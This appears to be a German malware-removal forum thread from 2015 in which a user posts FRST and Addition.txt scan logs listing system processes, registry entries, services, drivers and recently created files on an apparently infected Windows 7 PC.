Speicherinformationen =========================== Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+ Prozentuale Nutzung des RAM: 58% Installierter physikalischer RAM: 4094.49 MB Verfügbarer physikalischer RAM: 1705.98 MB Summe virtueller Speicher: 8187.13 MB Verfügbarer virtueller Speicher: 5521.21 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:186.31 GB) (Free:67.6 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)] Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D) Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C) Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ Geändert von Zympop (20.09.2015 um 19:24 Uhr) |
20.09.2015, 19:12 | #2 |
| Malware-gen, Adware-gen ...usw FRST
__________________Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015 durchgeführt von Kenny G (Administrator) auf KENNYG-PC (20-09-2015 19:34:14) Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 8 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe () C:\Windows\SysWOW64\PnkBstrA.exe () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcfgex.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3716624 2015-08-31] (Simply Super Software) HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse-Agent] => "C:\Program Files\Bitdefender\Bitdefender\pmbxag.exe" HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse] => "C:\Program Files\Bitdefender\Bitdefender\pwdmanui.exe" --hidden --nowizard HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse-Anwendungs-Agent] => "C:\Program Files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe" SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) Startup: C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk [2014-08-30] GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08] FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22] FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com Chrome: ======= CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/" CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16] CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16] CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16] CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15] CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2 CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03] CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03] CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03] CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27] CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03] CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18] CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03] CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03] CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url> ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.) S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.) S2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd) S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation) R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] () R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation) R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] () S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X] S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X] R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.) R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.) R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.) R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.) R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.) R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.) R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.) R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.) R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.) R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd) S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation) R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] () R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation) R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc) U3 fwdiipog; \??\C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt 2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe 2015-09-20 19:17 - 2015-09-20 19:17 - 00045165 _____ C:\Users\Kenny G\Downloads\Addition.txt 2015-09-20 19:16 - 2015-09-20 19:34 - 00019125 _____ C:\Users\Kenny G\Downloads\FRST.txt 2015-09-20 19:15 - 2015-09-20 19:34 - 00000000 ____D C:\FRST 2015-09-20 19:14 - 2015-09-20 19:15 - 02191360 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe 2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log 2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable 2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe 2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte 2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe 2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt 2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe 2015-09-20 17:43 - 2015-09-20 18:26 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe 2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe 2015-09-20 17:31 - 2015-09-20 17:31 - 05635119 _____ (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe 2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\Documents\Simply Super Software 2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Simply Super Software 2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Simply Super Software 2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover 2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Program Files (x86)\Trojan Remover 2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe 2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs 2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT 2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders 2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik 2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 __RHD C:\MSOCache 2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd 2015-09-19 12:21 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys 2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite 2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak 2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579--- 2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit 2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3) 2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip 2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform 2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help 2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help 2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder 2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe 2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk 2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip 2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe 2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup 2015-09-01 